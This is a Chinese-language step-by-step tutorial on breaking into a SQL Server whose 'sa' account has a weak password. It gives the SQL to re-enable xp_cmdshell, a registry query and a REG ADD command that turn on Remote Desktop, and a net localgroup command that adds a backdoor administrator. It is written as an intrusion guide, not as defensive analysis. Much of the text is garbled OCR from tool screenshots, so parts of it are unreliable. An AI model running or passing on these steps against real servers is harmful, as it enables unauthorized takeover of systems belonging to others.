使用SQL弱口令入侵SQL服務(wù)器的探討

使用SQL弱口令入侵SQL服務(wù)器使用的工具：掃描工具X-scanSQL查詢分析器SQLtools命令集成版環(huán)境：Windowsxp和WindowsServer2003企業(yè)版1、在網(wǎng)絡(luò)內(nèi)掃描到一臺SQLServer服務(wù)器，且sa密碼為弱口令1232、通過SQLtools命令集成版這個軟件，我們可以連上這臺SQLServer服務(wù)器，如下圖所示by：森度撞擊暮SQLTD0LS添度偷令集成版「契U哇接IP地址^2口元口擊端口~惘戶名密碼||123|數(shù)據(jù)庫名［master|蔓］by：森度撞擊-上隹步驟:.本地文件打開j每程路徑L上傳「SHELL'SQL命令：文件管理DIV5HELL安裝命令:：dirE*愈每mmam借XP^CMDSHELLrOASHELrJOBSHELLCDI路HELLCSESHELLc:\winnt\gy?tem32^!iias.mdb*TempFilej^\T3tmp.log恢復(fù)DLL路徑|xplog70.dllDLL路徑odsole70.dllDLL路徑|xpstar.dll全部恢復(fù)|員可因通過使用sp_configure啟用液p_CEcJshellL有關(guān)啟用：.'xpjcmdsheir的詳細(xì)信息，請參^SQLServer聯(lián)機叢書中的"外圍應(yīng)用配置器"。ErrorMessage:SQLSener阻止『對組件，xp_cmdshell，的過程,svs.xp_cmdshell"的訪問，因為此組件豈作為此服務(wù)器安全配置的一第分而被關(guān)閉.系統(tǒng)曾理員可也通過使用sp*onfigure啟用\p_cmdsheir<>有關(guān)后用\p_cmdsheir的詳細(xì)信息，請參閱SQLServer聯(lián)機叢書中的H外圍僉用配置器，Ver1.0CuriTiecttosqlserverVer1.03、雖然我們能succeed連接到SQLServer服務(wù)器，但是在我們執(zhí)行dirc:\查看c盤文件時候，可能會報錯，基于這種情況，我們可以使用SQL查詢分析器，修正該錯誤信息4、打開SQLServer查詢分析器，輸入IP地址和sa帳號及密碼5、在查詢分析器里輸入SQL語句，并執(zhí)行SQL語句：;EXECsp_configure'showadvancedoptions',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'xp_cmdshell',1--;RECONFIGUREWITHOVERRIDE--;EXECsp_configure'showadvancedoptions',0--遒SQL查謁會祈器，管，WIH同|S夷:對象網(wǎng)覽囂(0)目1mastermudelmedbtempdb￡01(sa)批查詢完成。文件西端輯電)查詢⑥TM(T)窗口⑩幫助01)□□□□目.S-..S-..S-..H-:EXECsp_configure；showadvancedoptions,1:RECONFIGUREWITHOVERRIDE—‘EXECsp_configureKp^mdshell，31:RECONFIGUREWITHOVERSIDE—口結(jié)果6、這時，我們在執(zhí)行dirc:\命令查看c盤下的文件，查詢成功□LL路徑|odsole70.dllDLL路徑|xpstar.dll全部恢復(fù)驅(qū)動器肴中的卷沒有標(biāo)簽-卷的序列號是54D7-6EABM的目錄2010-07-2809:040AUTOEXEC.BAT2010-07-2809:040CONFIG.SYS2010-07-2809:14<DIR>DocumentsaridSettings2010-07-2815:37<DIR>Inetpub2010-07-281&11<DIR>ProgramFiles2010-07-28■16:10<DIR>wir-JDOws2010-07-2809:04<DIR>wmpub?*文件。字節(jié)、在SQLtools工具的dos命令窗口，執(zhí)行netstat-an查看3389端口是否打開8、同時使用SQL命令需要查詢默認(rèn)的3389端口是否已經(jīng)被更改SQl命令查詢3389端口是否被更改：execxp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp','PortNumber'

9、很顯然，默認(rèn)3389端口沒有被修改，那么我們就可以執(zhí)行dos命令，開啟SQLServer服務(wù)器的3389端口DOS命令:REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f10、再次查詢SQlServer的3389端口是否已經(jīng)打開（很明顯我們已經(jīng)成功開啟對方的3389端口）11、這時我們可以使用我們熟悉的dos命令對該SQLServer服務(wù)器新建用戶，并加入到AdministratorsSQLTOOLS深度命令集成成2009.8.21最后修訂by：SQLTOOLS深度命令集成成2009.8.21最后修訂by：深庚陞擊舊地址端口~］用尸名密碼［?23|數(shù)據(jù)庫名［master連掇-上傳步驟——本地免牛|一”打開J遠(yuǎn)程路徑眼1上傳rSHELL”3命隹:脆!L命會'文件管理DIY.SHELL安裝命令|netlocalgroupatiministratora.ce.shi$/add■［身段￡□史頁更"pj^MDSHELLT^ASHELT1J^BSHELlTDIYSHELLCSESHELLc:\wihnt)system32^^asmdb千TempFile0\T3tmp.log—i詼復(fù)j_—■=■―=rDLL路徑xplog70.dllQLL路徑誠松口1"口.創(chuàng)DLL路徑｛xpstar.dll全部恢復(fù)12、現(xiàn)在，我們就可以是用遠(yuǎn)程桌面連接這臺SQLServer服務(wù)器了備注:一：現(xiàn)在的SQLServer服務(wù)器弱口令